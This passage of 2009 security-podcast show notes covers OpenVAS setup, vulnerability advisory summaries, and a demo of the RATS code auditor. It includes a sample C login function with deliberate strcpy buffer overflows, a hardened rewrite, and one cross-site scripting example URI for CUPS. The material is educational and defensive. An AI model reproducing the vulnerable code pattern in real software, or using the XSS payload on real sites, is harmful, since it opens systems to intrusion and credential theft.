root@bt:~/htmldoc-1.9.x-r1586# openvas-mkcert
/usr/sbin/openvas-mkcert: 85: 0: not found
-------------------------------------------------------------------------------
Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------

This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.


CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]: US
Your state or province name [none]:
Your location (e.g. town) [Paris]: Atlanta
Your organization [OpenVAS Users United]:






-------------------------------------------------------------------------------
Creation of the OpenVAS SSL Certificate
-------------------------------------------------------------------------------

Congratulations. Your server certificate was properly created.

/etc/openvas/openvasd.conf updated
The following files were created:

. Certification authority:
Certificate = /var/lib/openvas/CA/cacert.pem
Private key = /var/lib/openvas/private/CA/cakey.pem

. OpenVAS Server :
Certificate = /var/lib/openvas/CA/servercert.pem
Private key = /var/lib/openvas/private/CA/serverkey.pem

Press [ENTER] to exit

Then fetch the current set of network vulnerability tests (NVTs) before scanning:

openvas-nvt-sync

Start the OpenVAS server by typing the command “openvasd” in the terminal.  Open the OpenVAS Client by clicking on the Start button, going to Internet, and then clicking on OpenVAS-Client. Choose File > Connect and Enter the username and password which you created earlier. Wait for the client to connect to the server and then click File and then Scan Assistant.

Enter “localhost” to target your own computer for a scan.  Click the Execute button and once the scan is completed you will see “Report” followed by the date in the left pane of the OpenVAS client. Click on the report, and you can explore the report results in the middle and right panes of the client. You can also click on Report on the top command line of the OpenVAS client and click Print to make a pdf copy of the report.

2009
11.18

ISD Episode 11

InfoSec Daily Podcast

 

Vulnerabilities of Interest:

  1. Gimp PSD Image Parsing Integer Overflow Vulnerability – Secunia Research has discovered a vulnerability in Gimp, which can potentially be exploited by malicious people to compromise a user’s system. The vulnerability is caused by an integer overflow within the “read_channel_data()” function in plug-ins/file-psd/psd-load.c. This can be exploited to cause a heap-based buffer overflow by e.g. tricking a user into opening a specially crafted PSD file. The vulnerability is confirmed in version 2.6.7. Other versions may also be affected.
  2. Linux Kernel KVM MCE “KVM_X86_SETUP_MCE” Buffer Overflow – A vulnerability has been reported in the Linux Kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and potentially gain escalated privileges. The vulnerability is caused by an error within the “kvm_vcpu_ioctl_x86_setup_mce()” function in arch/x86/kvm/x86.c. This can be exploited to corrupt kernel memory by e.g. sending a specially crafted “KVM_X86_SETUP_MCE” IOCTL. Fixed in version 2.6.32-rc7.
  3. avast! Home/Professional aswRdr.sys Memory Corruption Vulnerability – A vulnerability has been discovered in avast! Home/Professional, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or potentially gain escalated privileges. The vulnerability is caused by an error in aswRdr.sys when processing IOCTLs. This can be exploited to corrupt kernel memory via a specially crafted 0x80002024 IOCTL.
  4. Home FTP Server “SITE INDEX” Denial of Service – A vulnerability has been discovered in Home FTP Server, which can be exploited by malicious users to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the handling of multiple “SITE INDEX” commands and can be exploited to stop the server. The vulnerability is confirmed in version 1.10.1.139. Other versions may also be affected. The currently offered solution is to restrict access to trusted users only.
  5. HP OpenView Network Node Manager ‘ovdbrun.exe’ Denial of Service Vulnerability – HP OpenView Network Node Manager (NNM) is prone to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. The issue affects NNM 7.51 and 7.53. An exploit is available in the wild.
  6. HP Discovery & Dependency Mapping Inventory Arbitrary Code Execution – A vulnerability has been reported in HP Discovery & Dependency Mapping Inventory (DDMI), which can be exploited by malicious users to compromise a vulnerable system. The vulnerability is caused due to an unspecified error and can be exploited to execute arbitrary code. The vulnerability is reported in HP Discovery & Dependency Mapping Inventory (DDMI) versions 2.5x, 7.5x, and 7.60, running on Windows. The solution is to apply patches.
  7. Warcraft III JASS Interpreter Arbitrary Code Execution – Some vulnerabilities have been reported in Warcraft III: The Frozen Throne, which can be exploited by malicious people to potentially compromise a user’s system. The vulnerabilities are caused due to errors within the JASS script handling, which can be exploited to e.g. execute arbitrary code by tricking a user into loading a specially crafted map. Partially fixed in version 1.24b.

News Items of Interest:

News item 1: (http://community.zdnet.co.uk/blog/0,1000000567,10014468o-2000331761b,00.htm?s_cid=292)

News item 2: (http://isc.sans.org/diary.html?storyid=7603&rss)

OpenVPN recommends upgrading to version 2.1_rc21, which is available here.

Additional information regarding OpenVPN session renegotiation is available here.

News item 3: (http://www.wtop.com/?nid=108&sid=1814785)

News item 4: (http://www.metasploit.com/framework/download)

After 12 months of development, version 3.3 of the Metasploit Framework has been released. Version 3.3 includes 120 new exploit modules, over 100 new auxiliary modules, and 180 bug fixes.

News item 5: (http://www.businesswire.com/portal/site/topix/?dmViewId=news_view&newsId=20091117005045&newsLang=en)

For more information and insight from DeepNines Security Lab: http://www.deepnines.com/security-lab/deepnines-security-labs.

News item 6: (http://www.infosecurity-magazine.com/view/5280/astaro-joins-free-it-security-software-industry-to-boost-profile/)

The software is available in two flavours: software appliance and virtual appliance.

News item 7: http://blogs.zdnet.com/security/?p=4956&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+zdnet%2Fsecurity+%28ZDNet+Zero+Day%29

Tech Segment:


Rough Auditing Tool for Security. RATS (Rough Auditing Tool for Security) is a tool for scanning C, C++, Perl, PHP and Python source code and flagging common security-related programming errors such as buffer overflows and TOCTOU (Time Of Check, Time Of Use) race conditions. The RATS scanning tool provides a security analyst with a list of potential trouble spots on which to focus, along with a description of each problem and, where possible, suggested remedies. It also provides a relative assessment of the potential severity of each problem, to help an auditor prioritize. The tool also performs some basic analysis to try to rule out conditions that are obviously not problems. RATS is free software, under the terms of the GNU General Public License.


RATS requires expat to be installed in order to build and run. Expat is often installed in /usr/local/lib and /usr/local/include. On some systems, you will need to pass the --with-expat-lib and --with-expat-include options to configure so that it can find your installation of the library and header. More Info: http://expat.sourceforge.net/


C:\Hold\rats-2.3-win32\rats-2.3>rats -h
RATS v2.3 - Rough Auditing Tool for Security
Copyright 2001, 2002 Secure Software Inc

http://www.securesoftware.com

usage: rats [-adhilrwxR] [--help] [--database|--db]  name1 name2 ... namen

-a <fun>       report any occurence of function 'fun' in the source file(s)
-d <filename>  specify an alternate vulnerability database.
--db
--database
-h             display usage information (what you're reading)
--help
-i             report functions that accept external input
--input
-l <language>  force the specified langauge to be used
--language <language>
-r             include references that are not function calls
--references
-w <1,2,3>     set warning level (default 2)
--warning <1,2,3>
-x             do not load default databases
-R             don't recurse subdirectories scanning for matching files
--no-recursion
--xml          Output in XML.
--html         Output in HTML.
--follow-symlinks
Follow symlinks and process files found.
--noheader
Don't print initial header in output
--nofooter
Don't show timing information footer at end of analysis
--quiet
Don't print status information regarding what file is being analyzed
--resultsonly
No header, footer, or status information
--columns
Show column number of hte line where the problem occured.
--context
Display the line of code that caused the problem report

So just running rats.exe without any flags provides you with stats on the vulnerability databases:

C:\Hold\rats-2.3-win32\rats-2.3>rats
Entries in perl database: 33
Entries in ruby database: 46
Entries in python database: 62
Entries in c database: 334
Entries in php database: 55
Total lines analyzed: 0
Total time 0.000000 seconds
-2147483648 lines per second

sample.c:

int login(const char *user, const char *pass)
{
    int authenticated = 0;
    char username[16];
    char password[16];
    strcpy (username, user);
    strcpy (password, pass);
    if (passwordLookup(&username, &password))
    {
        authenticated = 1;
    }
    return authenticated;
}

C:\Hold\rats-2.3-win32\rats-2.3>rats -l c sample.c
Entries in perl database: 33
Entries in ruby database: 46
Entries in python database: 62
Entries in c database: 334
Entries in php database: 55
Analyzing sample.c
sample.c:4: High: fixed size local buffer
sample.c:5: High: fixed size local buffer
Extra care should be taken to ensure that character arrays that are allocated
on the stack are used safely.  They are prime targets for buffer overflow
attacks.

sample.c:6: High: strcpy
sample.c:7: High: strcpy
Check to be sure that argument 2 passed to this function call will not copy
more data than can be handled, resulting in a buffer overflow.

Total lines analyzed: 13
Total time 0.032000 seconds
406 lines per second
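The two strcpy findings above, reworked into a bounds-checked login() as an added example (not code from the show notes or from RATS). passwordLookup() and the credentials it accepts are hypothetical stand-ins, since sample.c never defines the lookup:

```c
/* Added example, not code from the podcast notes or from RATS: the login()
 * from sample.c reworked so the "fixed size local buffer" and "strcpy"
 * findings cannot turn into a stack overflow. passwordLookup() is a
 * hypothetical stand-in, since sample.c never defines it. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CRED_MAX 16   /* same 16-byte buffers as sample.c */

/* Hypothetical credential check with constructed sample credentials. */
static int passwordLookup(const char *username, const char *password)
{
    return strcmp(username, "alice") == 0 && strcmp(password, "s3cret") == 0;
}

/* Return the length of s if it fits in a cap-byte buffer together with its
 * terminating NUL, otherwise -1. memchr bounds the scan, so an argument with
 * no terminator within cap bytes is never read any further. */
long fits_in_buffer(const char *s, size_t cap)
{
    const char *nul = s ? memchr(s, '\0', cap) : NULL;
    return nul ? (long)(nul - s) : -1;
}

/* Hardened form of sample.c's login(): validate both lengths first, then
 * copy exactly len + 1 bytes. Over-long input fails closed instead of being
 * silently truncated (which a plain strncpy() would do, possibly leaving the
 * buffer unterminated). */
int login_safe(const char *user, const char *pass)
{
    char username[CRED_MAX];
    char password[CRED_MAX];
    long ulen = fits_in_buffer(user, sizeof username);
    long plen = fits_in_buffer(pass, sizeof password);

    if (ulen < 0 || plen < 0)
        return 0;                         /* would overflow: reject */

    memcpy(username, user, (size_t)ulen + 1);
    memcpy(password, pass, (size_t)plen + 1);
    return passwordLookup(username, password) ? 1 : 0;
}

int main(void)
{
    /* Constructed inputs: a valid pair, and a user name that sample.c would
     * have written straight past the end of username[16]. */
    printf("alice/s3cret -> %d\n", login_safe("alice", "s3cret"));
    printf("30-byte user -> %d\n",
           login_safe("this-user-name-is-far-too-long", "s3cret"));
    return 0;
}
```

Note the off-by-one that fits_in_buffer() guards against: a 16-character name is one byte too long for a 16-byte buffer because of the terminator.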

htpasswd.c analyzed:

C:\Hold\rats-2.3-win32\rats-2.3>rats -l c htpasswd.c
Entries in perl database: 33
Entries in ruby database: 46
Entries in python database: 62
Entries in c database: 334
Entries in php database: 55
Analyzing htpasswd.c
htpasswd.c:30: High: fixed size local buffer
htpasswd.c:38: High: fixed size local buffer
htpasswd.c:39: High: fixed size local buffer
htpasswd.c:50: High: fixed size local buffer
Extra care should be taken to ensure that character arrays that are allocated
on the stack are used safely.  They are prime targets for buffer overflow
attacks.

htpasswd.c:33: High: fprintf
Check to be sure that the non-constant format string passed as argument 2 to
this function call does not come from an untrusted source that could have added
formatting characters that the code is not prepared to handle.

htpasswd.c:58: High: strcpy
Check to be sure that argument 2 passed to this function call will not copy
more data than can be handled, resulting in a buffer overflow.

Total lines analyzed: 134
Total time 0.031000 seconds
4322 lines per second

Download Source tarball: rats-2.3.tar.gz

Download Win32 binary: rats-2.3-win32.zip

2009
11.17

ISD Episode 10

InfoSec Daily Podcast

 

Announcements:

A quick reminder about the DC404 meeting this Saturday 2PM @ the Vortex Midtown.


Vulnerabilities of Interest:

  1. Wikipedia Toolbar Remote Code Execution Vulnerability – The Wikipedia Toolbar add-on for Firefox is prone to a remote code-execution vulnerability; fixes are available. Attackers can exploit this issue to execute arbitrary JavaScript code with chrome privileges, which may result in a compromise of the affected computer. The issue affects Wikipedia Toolbar 0.5.9; other versions may also be affected. The vendor fixed the issue in the experimental version 0.5.9.2.
  2. Linux Kernel ‘nfs4_proc_lock()’ Local Denial of Service Vulnerability – The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause the kernel to panic, denying service to legitimate users. Versions prior to Linux kernel 2.6.31-rc4 are vulnerable.
  3. Linux Kernel ‘pipe.c’ Local Privilege Escalation Vulnerability – The Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. Exploits are available: 36901.sh 36901.py 36901-1.c 36901-2.c. Updates are available from the vendors.
  4. CUPS ‘kerberos’ Parameter Cross Site Scripting Vulnerability – CUPS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Note: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it. This issue affects CUPS versions prior to 1.4.2. Attackers can exploit this issue by enticing an unsuspecting victim into following a malicious URI. The following example URI is available: http://www.example.com/admin/?kerberos=onmouseover=alert
  5. Samba Oplock Break Notification Remote Denial of Service Vulnerability – Samba is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause the application to consume excessive CPU resources, denying service to legitimate users. Versions prior to Samba 3.4.2, 3.3.8, 3.2.15, and 3.0.37 are vulnerable. To exploit this issue, attackers can use readily available network utilities.
  6. Novell eDirectory Multiple Vulnerabilities – Novell eDirectory is prone to multiple buffer-overflow and denial-of-service vulnerabilities. Successful exploits may allow attackers to execute arbitrary code within the context of the affected application or cause denial-of-service conditions. These issues affect eDirectory 8.8 SP3 and 8.8 SP3 FTF3.

News Items of Interest:

Item 1: (http://www.pcworld.com/article/182180/top_5_social_engineering_exploit_techniques.html?tk=rss_news)

Item 2: (http://jeremiahgrossman.blogspot.com/2009/11/owasp-top-10-2010-release-candidate-1.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+JeremiahGrossman+%28Jeremiah+Grossman%29)

Download URL: http://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf

News item 3: (http://www.phiprivacy.net/?p=1294)

News item 5: (http://www.securegoose.org/2009/11/tls-renegotiation-vulnerability-cve.html)

News item 6: (http://www.v3.co.uk/v3/news/2253269/mcafee-warns-cyber-warfare)

News item 7: (http://www.csoonline.com/article/507936/The_Botnet_Hunters_?source=rss_cso_exclude_net_net)

If you are interested in a Nepenthes VM then you can find one here: http://www.sparsa.org/drupal/?q=node/11

News item 8: (http://www.theregister.co.uk/2009/11/17/bank_of_america_skimming_plea/)

Tech Segment:

NetWitness NextGen is a comprehensive network security monitoring solution for finding insider threats, data leakage, malware activity, asset misuse, network anomalies, compliance issues, and network e-discovery. NetWitness can easily correlate IP addresses in network sessions to end-user directory credentials by making use of Active Directory. As a result, you can easily link compromised machines and inappropriate network behavior to a user’s actual identity.
NetWitness is a security intelligence product that audits and monitors all traffic on a network. It creates a comprehensive log of all network activities and interprets the activities into a format that network engineers and non-engineers alike can quickly understand. NetWitness INVESTIGATOR is the application you use to analyze the data captured from your network in order to identify possible internal or external threats to your security and IP infrastructure.
NetWitness converts each protocol into a common language, so knowledge of protocols is no longer needed. Performing analysis using INVESTIGATOR can be as simple as looking for user names, e-mails, applications, resources, actions, or computer names.
A parser is a program, usually part of a compiler, that receives input in the form of sequential source program instructions, interactive online commands, markup tags, or some other defined interface and breaks them up into parts (for example, the nouns (objects), verbs (methods), and their attributes or options) that can then be managed by other programming (for example, other components in a compiler). A parser may also check to see that all input has been provided that is necessary.
A Collection is a logically related group of packets. It consists of one or more capture or remote device files. A collection can be created either by the live capture capability within NetWitness INVESTIGATOR, by importing existing pcap files, or by connecting to another NetWitness appliance.
So now you can create a new Collection, but you won’t see anything until you go into Edit > Options > Capture to select your adapter. At this point you can start capturing traffic for analysis.
The interesting thing with NetWitness is that you can leave it running for long periods of time and check on the status of the various styles with the toggle buttons. When you find an item that you want to drill down into, you simply click on that address or item for more information.
  • Support for 802.11 Wireless Capture – initially supported under the portable NextGen Eagle platform, this capability will be available on all NextGen 9.0 capture platforms. This new capability supports WEP in-line decryption, and will support WPA decryption under an upcoming service pack.
  • 10 Gbps Network Support – building off of real-world experiences with massive government, commercial and service provider networks, unlike other products in this space, NextGen 9.0 includes support for both capture and real-time analysis on 10 Gbps networks.
  • Expanded authentication options – NextGen 9.0 supports Linux PAM, providing pluggable authentication modules that connect the NextGen infrastructure to customer authentication frameworks such as Kerberos for Windows and Unix environments, LDAP, Radius and many others.
  • Expanded enterprise management – NextGen 9.0 introduces a new administrative dashboard that enables comprehensive insight into global health across all connected appliances. This includes real-time feedback and charting for all system metrics, and expanded interfaces for managing configuration parameters, rules, alerts, parsers, feeds, and software updates across all devices from a single location.
  • Scriptable API – expanded support within the Software Development Kit (SDK) for C, C#, Java, Python, Perl, Ruby and .Net allowing programmers to extend the NextGen infrastructure using almost any popular language.
More information at http://www.netwitness.com
Release Date: 11/16/2009
Version: 9.0.4.3
File Size: 76.8MB

Attacker: Obviously, as an attacker, this tool can be used to obtain some truly sweet information that can be used to further compromise hosts.

Defender: I think this is really more of a sweet spot for this tool, but it seems that it might be more of an educational experience when you run this tool.

Upcoming Episodes:

In an upcoming Episode we will have forensics expert Scott Moulton, and Pieter Swanpoel who will provide us with a glimpse into Mainframe Security.